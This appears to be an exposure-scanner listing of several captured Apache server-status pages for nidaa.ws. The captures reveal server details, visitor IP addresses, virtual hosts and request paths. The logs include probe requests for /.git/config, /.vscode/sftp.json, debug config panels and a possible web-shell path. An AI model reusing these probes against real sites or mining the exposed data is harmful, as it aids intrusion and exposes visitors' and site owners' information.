      188.114.102.201http/1.1qr.brunch.ws:443GET /storage/food_image/17088481891935_imgeb2b4322c0164d6c804d5
      
      0-5269680/90/3972_
      8.30101534757590.04.86664.57
      52.230.152.66http/1.1garndhabi.org:80GET /up//upload//assets/plugins/pace/assets/plugins/jquery-vali
      
      0-5269680/60/4162_
      8.2653631766030.04.38556.26
      188.114.102.139http/1.1qr.brunch.ws:443GET /storage/food_image/17162866023190_almondcoffeethermos.jpg 
      
      0-5269680/58/3920_
      8.3141825501790.03.45625.66
      52.230.152.66http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-5269680/82/4612_
      8.29211734502820.023.46713.40
      52.230.152.172http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      0-5269681/19/4090K
      8.310028659690.84.85771.32
      172.70.47.87http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-5269680/93/3790_
      8.31025225454730.04.26500.47
      52.230.152.66http/1.1garndhabi.org:80GET /up//upload//assets/plugins/pace/assets/plugins/animate.min
      
      0-5269680/84/4575_
      8.29261424574090.06.82418.83
      52.230.152.172http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-5269680/39/4109_
      8.3081636822990.00.84905.15
      52.230.152.66http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      0-5269680/53/4173_
      8.1855625780800.01.11764.05
      188.114.102.194http/1.1qr.brunch.ws:443GET /storage/food_image/17088484233758_imgacf71be0991e4e4186ad5
      
      0-5269680/67/4312_
      8.1955535738750.06.41572.11
      188.114.102.228http/1.1qr.brunch.ws:443GET /storage/food_image/17085175482929_whatsappimage20240221at3
      
      0-5269680/57/3983_
      8.3161720760190.03.74621.60
      52.230.152.66http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-5269680/46/3903_
      8.2453223099700.09.45709.09
      188.114.102.181http/1.1qr.brunch.ws:443GET /storage/food_image/17162861147551_hotchocolat.jpg HTTP/1.1
      
      0-5269680/37/4164_
      8.28293447845270.021.86632.26
      52.230.152.172http/1.1garndhabi.org:80GET /up//upload//webarch/js/assets/plugins/pace/pace.min.js HTT
      
      0-5269680/33/4340_
      8.28303222805510.01.96680.13
      52.230.152.172http/1.1garndhabi.org:80GET /up//upload//webarch/js/assets/plugins/pace/pace-theme-flas
      
      0-5269680/53/4178_
      8.2353531577750.03.67545.18
      188.114.102.184http/1.1qr.brunch.ws:443GET /storage/food_image/17162860982324_cortado.jpg HTTP/1.1
      
      0-5269680/31/3967_
      8.21543199153320.010.67507.89
      188.114.102.155http/1.1qr.brunch.ws:443GET /storage/food_image/17096777357107_nutella.webp HTTP/1.1
      
      0-5269680/97/4154_
      8.30181720310880.08.65614.07
      52.230.152.172http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-5269680/43/4046_
      8.2730426932820.027.36656.92
      66.249.64.9http/1.1hawsab.me:80GET /?usz8567oofrq572.html HTTP/1.1
      
      0-5269680/58/4284_
      8.30163723291280.02.63555.87
      52.230.152.172http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-5269680/59/4245R
      7.7758928023897150.05.89702.32
      5.245.217.90http/1.1
      
      1-556500/109/3603_
      25.00301741258000.013.06756.91
      52.230.152.172http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      1-556500/116/3938_
      24.9553637251200.028.23641.65
      188.114.102.150http/1.1qr.brunch.ws:443GET /storage/food_image/17162863763766_turkishcoffee.jpg HTTP/1
      
      1-556500/158/4190_
      24.9354731855240.029.69676.88
      188.114.102.205http/1.1qr.brunch.ws:443GET /storage/food_image/17096788182857_mango.webp HTTP/1.1
      
      1-556500/177/4070_
      24.9653630647670.018.99607.85
      188.114.102.238http/1.1qr.brunch.ws:443GET /storage/food_image/17162864298528_micchiato.jpg HTTP/1.1
      
      1-556500/161/3892_
      24.8955731530180.047.36562.64
      188.114.102.199http/1.1qr.brunch.ws:443GET /storage/food_image/17088494201379_img3d0559256f09407291a00
      
      1-556500/168/3780_
      25.02123423141980.024.89511.10
      52.230.152.66http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      1-556500/209/3933_
      24.9753650994530.0105.21655.45
      188.114.102.56http/1.1qr.brunch.ws:443GET /assets/js/pages/form-validation.init.js HTTP/1.1
      
      1-556500/
      Found on 2024-05-29 20:11
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7987a4c45

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 28-May-2024 22:46:32 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  5 days 18 hours 41 minutes 42 seconds
      Server load: 0.61 0.56 0.57
      Total accesses: 802682 - Total Traffic: 114.1 GB - Total Duration: 868091587
      CPU Usage: u368.67 s36.79 cu3408.14 cs744.57 - .913% CPU load
      1.61 requests/sec - 239.6 kB/second - 149.0 kB/request - 1081.49 ms/request
      11 requests currently being processed, 0 workers gracefully restarting, 239 idle workers
      ____K_______________W_______K________________________W__________
      ______________________________K_____R________________________WWW
      WWWWWWWWWWWWWWWWWWWWWW__________________________________________
      ____K____K________________________K_____________________________
      ____________R___K__.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-5240290/364/4094_
      30.5349132063670.015.49596.73
      139.162.155.225http/1.1thenewjeddah.com:443GET /.vscode/sftp.json HTTP/1.1
      
      0-5240290/207/3397_
      30.52102216249080.011.18443.45
      51.253.138.241http/1.1albayan.edu.sa:443GET /web/images/logo_school.png HTTP/1.1
      
      0-5240290/233/3729_
      30.39269218731880.088.98532.22
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      0-5240290/192/3589_
      30.33514347742740.011.88422.96
      139.162.155.225http/1.1
      
      0-5240291/191/3686K
      30.540127008440.870.67625.12
      172.70.250.67http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-5240290/182/3457_
      30.37475230646070.052.59473.15
      207.154.197.113http/1.1tasbeeh.thenewjeddah.com:443GET /.git/config HTTP/1.1
      
      0-5240290/224/3686_
      30.537820825275880.066.19492.36
      51.223.61.108http/1.1albayan.edu.sa:443GET /imgweb/qb40/5/log12.pdf HTTP/1.1
      
      0-5240290/230/3516_
      30.29552423868510.027.78570.75
      46.52.116.32http/1.1
      
      0-5240290/185/4017_
      30.36479530096030.032.08630.54
      172.70.250.19http/1.1qr.brunch.ws:443GET /storage/food_image/17088458847942_oip6.jpg HTTP/1.1
      
      0-5240290/207/3689_
      30.5113318527290640.0136.80590.55
      31.167.164.116http/1.1albayan.edu.sa:443GET /images/slider/03.jpg HTTP/1.1
      
      0-5240290/220/3236_
      30.364771223755520.011.54447.50
      207.154.197.113http/1.1tasbeeh.thenewjeddah.com:443GET /debug/default/view?panel=config HTTP/1.1
      
      0-5240290/274/4049_
      30.43241323709230.037.35389.57
      145.82.134.38http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/tOjex3mEFyPsbTAT8gkfRn
      
      0-5240290/211/3685_
      30.412534732782780.039.16776.87
      66.249.70.6http/1.1jawad.com.sa:443POST /api/v.1/front/new/product?page=1 HTTP/1.1
      
      0-5240290/241/3701_
      30.30286524742980.0133.38734.37
      128.234.98.38http/1.1
      
      0-5240290/249/3835_
      30.384634333841800.018.33467.38
      40.77.188.153http/1.13dvi.com:443GET /api/settings/get HTTP/1.1
      
      0-5240290/233/3496_
      30.5448116991740.020.15562.27
      139.162.155.225http/1.1thenewjeddah.com:443GET /.git/config HTTP/1.1
      
      0-5240290/238/3394_
      30.46238216922093660.018.14615.43
      128.234.150.190http/1.1albayan.edu.sa:443GET /images/slider/08.jpg HTTP/1.1
      
      0-5240290/176/3555_
      30.1728931222525730.015.91510.21
      82.197.48.139http/1.1
      
      0-5240290/191/3805_
      30.27163318944700.028.01542.05
      37.106.13.31http/1.1
      
      0-5240290/245/3652_
      30.46235028156320.011.92435.15
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      0-5240290/179/3546W
      27.433790026182570.027.20457.07
      65.154.226.169http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-5240290/229/3634_
      30.14478217541950.012.37474.73
      207.154.197.113http/1.1
      
      0-5240290/236/3634_
      30.471667325349400.070.99563.32
      95.186.35.116http/1.1albayan.edu.sa:443GET /web/38.html HTTP/1.1
      
      0-5240290/191/3716_
      30.38415118515920.059.97492.13
      20.26.44.173http/1.1albayan.edu.sa:443GET /imgweb/bank/5/log523.pdf HTTP/1.1
      
      0-5240290/174/3787_
      30.3294420661590.054.42663.92
      51.253.138.241http/1.1
      
      1-5277640/159/3237_
      27.7951039897260.093.32673.28
      139.162.155.225http/1.1thenewjeddah.com:443GET / HTTP/1.1
      
      1-5277640/229/3546_
      27.74133231794110.079.49545.98
      31.167.164.116http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/thumb_bg.png HTTP/
      
      1-5277640/225/3758_
      27.613798224773960.034.49585.67
      192.133.77.16http/1.1wahjcm.com:443GET /article/single/46 HTTP/1.1
      
      1-5277641/204/3508K
      27.7902241373266.611.64533.02
      172.71.250.30http/1.1nidaa.ws:80GET / HTTP/1.1
      
      1-5277640/159/3435_
      27.56475128275660.037.20500.03
      207.154.197.113http/1.1tasbeeh.thenewjeddah.com:443GET /.vscode/sftp.json HTTP/1.1
      
      1-5277640/233/3367_
      27.57477118890990.020.24441.44
      207.154.197.113http/1.1tasbeeh.thenewjeddah.com:443GET /.DS_Store HTTP/1.1
      
      1-5277640/266/3496_
      27.788345228500880.024.84482.75
      5.163.78.218http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/12/1E3A0784-scaled.jpg HTTP/1.1
      
      1-5277640/191/3504_
      27.7950126540510.027.28483.54
      139.162.155.225http/1.1thenewjeddah.com:443GET /.DS_Store HTTP/1.1
      
      1-5277640/187/3301_
      27.64273432959540.015.79497.13
      128.234.98.38http/1.1albayan.edu.sa:4
      Found on 2024-05-28 19:46
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df73d8c3825

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Monday, 27-May-2024 19:00:21 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 5
      Parent Server MPM Generation: 4
      Server uptime:  4 days 14 hours 55 minutes 31 seconds
      Server load: 0.53 0.52 0.46
      Total accesses: 640395 - Total Traffic: 91.3 GB - Total Duration: 676364142
      CPU Usage: u486.57 s63.32 cu2533.76 cs556.61 - .912% CPU load
      1.6 requests/sec - 239.9 kB/second - 149.6 kB/request - 1056.17 ms/request
      10 requests currently being processed, 0 workers gracefully restarting, 240 idle workers
      ________________K__________________K____________________________
      ____K___W______K_____________________________K__________________
      ___________K_________________________K__________________________
      __________________________W__W____________________________......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-4221720/416/3075_
      55.14376129081350.0146.67524.20
      5.82.53.163http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-4221720/411/2693_
      55.33161814870180.030.28400.75
      85.208.96.196http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=1211 HTTP/1.1
      
      0-4221720/523/2952_
      55.2326910913359730.043.50358.05
      54.36.149.71http/1.1daris.live:80GET /product/19 HTTP/1.1
      
      0-4221720/510/2965_
      55.14409988373510.071.01350.12
      27.115.124.5http/1.1akg.sa:443GET /robots.txt HTTP/1.1
      
      0-4221720/440/3001_
      55.27173222372000.087.28435.16
      31.167.106.23http/1.1albayan.edu.sa:443GET /js/jquery-1.3.2.js HTTP/1.1
      
      0-4221720/425/2725_
      55.31101026401590.027.89392.57
      40.77.167.45http/1.1albayan.edu.sa:80GET /e_sch/news_replies.php?user=web&i_f=1465&l_n=1&page=1 HTTP
      
      0-4221720/468/2948_
      55.30118422684910.084.78394.75
      5.110.140.183http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/1D92GOCkUUxk9KBgmE7pG7
      
      0-4221720/426/2731_
      55.25211217917500.0104.94473.74
      175.110.169.80http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-4221720/467/3393_
      55.13419028302730.020.66554.56
      64.225.75.246http/1.1randalift.com.sa:80GET /login.action HTTP/1.1
      
      0-4221720/450/2913_
      55.31843417394380.029.17423.01
      3.250.151.88http/1.1albayan.edu.sa:443GET /imgweb/file44/71%20%D8%AA%D8%A7%D8%A8%D8%B9%20%D8%AF%D9%84
      
      0-4221720/358/2534_
      55.32463215768610.017.39385.22
      176.224.249.92http/1.1albayan.edu.sa:443GET /web/images/logo_school.png HTTP/1.1
      
      0-4221720/426/3272_
      55.22314119446200.063.88310.52
      169.148.69.160http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-4221720/397/2931_
      55.23276222737080.053.68551.65
      31.167.106.23http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/shad_lhs.png HTTP/
      
      0-4221720/464/2955_
      55.134212318503210.052.50430.89
      64.225.75.246http/1.1php.we3dvi.com:80\x16\x03\x01\x01\b\x01
      
      0-4221720/425/3063_
      55.0339375826216910.0103.41398.34
      27.115.124.112http/1.1
      
      0-4221720/430/2770_
      55.1634658712301190.056.45503.56
      5.163.86.120http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%A8%D9%86%D9%83%20%D8%A7%D9%84%D8%B1%D9%8
      
      0-4221721/355/2702K
      55.330112351100.817.79459.87
      162.158.159.24http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-4221720/341/2841_
      55.18334319733510.056.87446.18
      51.36.76.245http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=3.2.1 HTTP/1.1
      
      0-4221720/430/3095_
      55.14374017171350.066.73416.32
      51.39.215.196http/1.1albayan.edu.sa:80GET /web/images/logo_school.png HTTP/1.1
      
      0-4221720/372/2892_
      55.27140123429820.059.28307.87
      178.87.96.221http/1.1albayan.edu.sa:443GET /e_sch/font/css/font-awesome.min.css HTTP/1.1
      
      0-4221720/471/2909_
      55.25190024584670.085.64400.14
      66.249.64.9http/1.1albayan.edu.sa:80GET /web.html HTTP/1.1
      
      0-4221720/511/2936_
      55.092782414797600.031.82397.33
      64.226.71.192http/1.1
      
      0-4221720/384/2807_
      55.09273218410510.023.79458.95
      169.148.69.160http/1.1
      
      0-4221720/445/2967_
      54.842792614944110.040.41396.39
      51.36.76.245http/1.1
      
      0-4221720/359/3130_
      55.10206018450080.080.28556.85
      176.224.249.92http/1.1
      
      1-4222000/396/2675_
      53.4260330029650.024.12494.05
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1716825561.66776490211486816406
      
      1-4222000/461/2830_
      53.35138329759170.025.87437.71
      178.87.96.221http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      1-4222000/454/2877_
      53.2824018519523770.0100.42488.83
      176.224.249.92http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%AA%D9%88%D8%AC%D9%8A%D9%87%D8%A7%D8%AA%20%
      
      1-4222000/415/2639_
      53.31209120152190.051.03393.79
      175.110.169.80http/1.1albayan.edu.sa:443GET /apple-touch-icon.png HTTP/1.1
      
      1-4222000/312/2780_
      53.38118914854950.076.21392.93
      151.254.227.88http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      1-4222000/456/2600_
      53.27278213918120.036.28320.89
      64.226.71.192http/1.1randalift.com.sa:443GET / HTTP/1.1
      
      1-4222000/514/2705_
      53.26299015204250.072.25389.15
      81.177.136.216http/1.1proxy-subdomains-vhost.localhosGET /wp-login.php HTTP/1.1
      
      1-4222000/382/2703_
      53.26326217120060.051.41424.25
      5.82.25.202http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      Found on 2024-05-27 16:00
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df722de674c

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Monday, 27-May-2024 12:30:40 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 5
      Parent Server MPM Generation: 4
      Server uptime:  4 days 8 hours 25 minutes 50 seconds
      Server load: 0.64 0.49 0.44
      Total accesses: 601580 - Total Traffic: 85.8 GB - Total Duration: 648443297
      CPU Usage: u409.89 s48.76 cu2437.04 cs538.53 - .913% CPU load
      1.6 requests/sec - 239.3 kB/second - 149.5 kB/request - 1077.9 ms/request
      14 requests currently being processed, 0 workers gracefully restarting, 236 idle workers
      ____________________K______________W______K_______________K_____
      _____________________________K__________________________K_K_____
      ________________K____________R______K___________K_______________
      _________K___R____________________________K_______________......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-4221720/199/2858_
      33.99179228264600.068.87446.41
      109.171.133.89http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/1D92GOCkUUxk9KBgmE7pG7
      
      0-4221720/247/2529_
      33.86281214449910.018.91389.38
      193.186.4.95http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-4221720/344/2773_
      34.021147112367640.021.36335.91
      54.36.149.17http/1.1daris.live:80GET /user?redirect=product/1/how-to-draw-characters HTTP/1.1
      
      0-4221720/321/2776_
      33.84325288100360.021.95301.07
      2.90.72.215http/1.1albayan.edu.sa:443GET //registration/show/assets/css/style.css HTTP/1.1
      
      0-4221720/232/2793_
      33.85298321766570.045.90393.78
      138.201.201.48http/1.1zed.sa:80POST /wp-cron.php?doing_wp_cron=1716801942.01234889030456542968
      
      0-4221720/241/2541_
      33.58274324487420.018.73383.42
      2.90.72.215http/1.1
      
      0-4221720/296/2776_
      33.8726625222470850.071.24381.20
      47.128.62.223http/1.1daris.live:80GET /assets/default/stylesheets/vendor/mdi/css/materialdesignic
      
      0-4221720/245/2550_
      33.9223771617541350.064.26433.07
      83.99.151.68http/1.1zed.sa:80GET /product/strawberry/ HTTP/1.1
      
      0-4221720/228/3154_
      33.81211328000930.012.60546.49
      2.90.72.215http/1.1
      
      0-4221720/318/2781_
      33.97202117253510.016.88410.72
      47.128.45.131http/1.1daris.live:443GET /assets/default/404/images/404.png HTTP/1.1
      
      0-4221720/219/2395_
      33.962086944215568820.09.67377.50
      176.29.170.148http/1.1albayan.edu.sa:443GET /imgweb/msr5.JPG HTTP/1.1
      
      0-4221720/253/3099_
      33.902634819240400.049.47296.11
      216.244.66.198http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1626&l_n=1&page=1 HTTP
      
      0-4221720/249/2783_
      34.05382722443420.041.73539.70
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      0-4221720/257/2748_
      33.85315213454200.019.58397.97
      51.36.219.31http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-4221720/274/2912_
      33.91245125802590.020.22315.15
      47.128.62.223http/1.1daris.live:80GET /assets/default/vendor/auto-numeric/autoNumeric.js HTTP/1.1
      
      0-4221720/208/2548_
      34.01139211439960.013.31460.43
      176.224.91.114http/1.1albayan.edu.sa:443GET /web/images/logo_school.png HTTP/1.1
      
      0-4221720/215/2562_
      33.84327310154550.04.95447.03
      138.201.201.48http/1.1zed.sa:80POST /wp-cron.php?doing_wp_cron=1716801912.59455895423889160156
      
      0-4221720/219/2719_
      34.0613019571620.050.28439.60
      142.202.48.16http/1.1ucc.thenewjeddah.com:80GET /images/images/cache.php HTTP/1.1
      
      0-4221720/269/2934_
      33.8827026015226070.057.10406.70
      31.167.72.252http/1.1albayan.edu.sa:443GET /imgweb/1445/%D9%81%D9%8A%D8%AF%D9%8A%D9%88%20%D9%88%D8%A7%
      
      0-4221720/235/2755_
      33.9718778022933960.035.31283.90
      83.99.151.64http/1.1zed.sa:80GET /product/carrots-with-orange/ HTTP/1.1
      
      0-4221721/298/2736K
      34.060122064460.838.90353.40
      162.158.95.166http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-4221720/320/2745_
      33.9915845614044880.020.09385.60
      114.119.156.193http/1.1daris.live:80GET /product/94 HTTP/1.1
      
      0-4221720/265/2688_
      34.06113416423670.016.94452.10
      31.167.72.252http/1.1albayan.edu.sa:443GET /web/38.html HTTP/1.1
      
      0-4221720/231/2753_
      34.0213544712459010.020.78376.76
      51.252.189.66http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%A7%D9%84%D9%88%D8%AD%D8%AF%D8%A9%20%D8%A
      
      0-4221720/263/3034_
      33.9718717418316200.072.01548.58
      109.171.133.89http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      1-4222000/283/2562_
      32.8914974429775340.014.49484.41
      83.99.151.64http/1.1zed.sa:80GET /product/profitroll/ HTTP/1.1
      
      1-4222000/250/2619_
      32.921428029583700.018.02429.85
      83.99.151.65http/1.1zed.sa:80GET /product/quinoa-tabouleh/?lang=ar HTTP/1.1
      
      1-4222000/267/2690_
      32.80279217175550.040.45428.85
      31.167.168.136http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      1-4222000/231/2455_
      32.82238118009920.033.54376.30
      47.128.62.223http/1.1daris.live:80GET /assets/default/404/css/icons.css HTTP/1.1
      
      1-4222000/192/2660_
      32.69108214195870.039.73356.45
      2.90.72.215http/1.1
      
      1-4222000/243/2387_
      32.8226319213624310.018.16302.78
      31.167.168.136http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%AC%D8%AF%D9%88%D9%84%20%D8%A7%D9%84%D8%B5%
      
      1-4222000/327/2518_
      32.916378613503210.048.92365.82
      83.99.151.64http/1.1zed.sa:80GET /product/4267/ HTTP/1.1
      
      1-4222000/209/2530_
      32.85
      Found on 2024-05-27 09:30
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7ffacbd0c

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 26-May-2024 12:19:35 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 3
      Parent Server MPM Generation: 2
      Server uptime:  3 days 8 hours 14 minutes 45 seconds
      Server load: 0.38 0.38 0.38
      Total accesses: 469219 - Total Traffic: 65.1 GB - Total Duration: 501209618
      CPU Usage: u292.98 s35.39 cu1919.14 cs420.05 - .923% CPU load
      1.62 requests/sec - 236.2 kB/second - 145.4 kB/request - 1068.18 ms/request
      11 requests currently being processed, 0 workers gracefully restarting, 239 idle workers
      ______________K_______________K_________________________________
      ________________________________________K_______________________
      ____K______________________K_W______________________________K_K_
      ________..................................................______
      ____K________________K__________R___________....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-265560/172/2293_
      19.70421221705970.08.15273.71
      2.90.166.121http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-265560/181/1963_
      19.83160113154530.08.06324.37
      66.249.66.81http/1.1albayan.edu.sa:443GET /imgweb/file44/11111%20(1).pdf HTTP/1.1
      
      0-265560/190/2060_
      19.62454110920150.09.09239.65
